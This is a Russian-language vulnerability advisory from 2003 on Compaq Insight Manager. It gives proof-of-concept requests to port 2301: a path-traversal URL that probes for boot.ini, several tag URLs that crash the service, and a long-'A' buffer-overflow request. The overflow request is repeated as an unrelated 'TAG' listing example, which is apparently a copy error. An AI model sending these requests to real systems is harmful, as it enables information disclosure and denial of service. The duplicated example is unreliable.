Несколько уязвимостей в Compaq Insight Manager

Дата публикации:
07.04.2003
Всего просмотров:
661
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Несколько уязвимостей обнаружено в Compaq's Insight Manager. Удаленный пользователь может определить существование файла на системе. Также удаленный пользователь может аварийно завершить работу сервиса.

Сообщается, что удаленный пользователь может запросить следующий URL, чтобы определить существования файла на сервере:

http://[target]:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini
Также сообщается, что несколько URL могут вызвать переполнение стека:
http://[target]:2301/<!.StringRedirecturl>
http://[target]:2301/<!> 
http://[target]:2301/survey/<!>
http://[target]:2301/<!.StringHttpRequest=Url>
http://[target]:2301/survey/<!.StringHttpRequest=Url>
http://[target]:2301/<!.St ringIsapiECB=lpszPathInfo>
http://[target]:2301/<!.ObjectIsapiECB>
Переполнение буфера может быть вызвано следующим запросом:
GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0
Также удаленный пользователь может просмотреть 'TAG' список, запрашивая следующий URL:
 
GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0
Все вышеперечисленные проблемы могут также эксплуатироваться через https порт.

Ссылки: Compaq/HP WBEM stuff (fwd)
или введите имя

CAPTCHA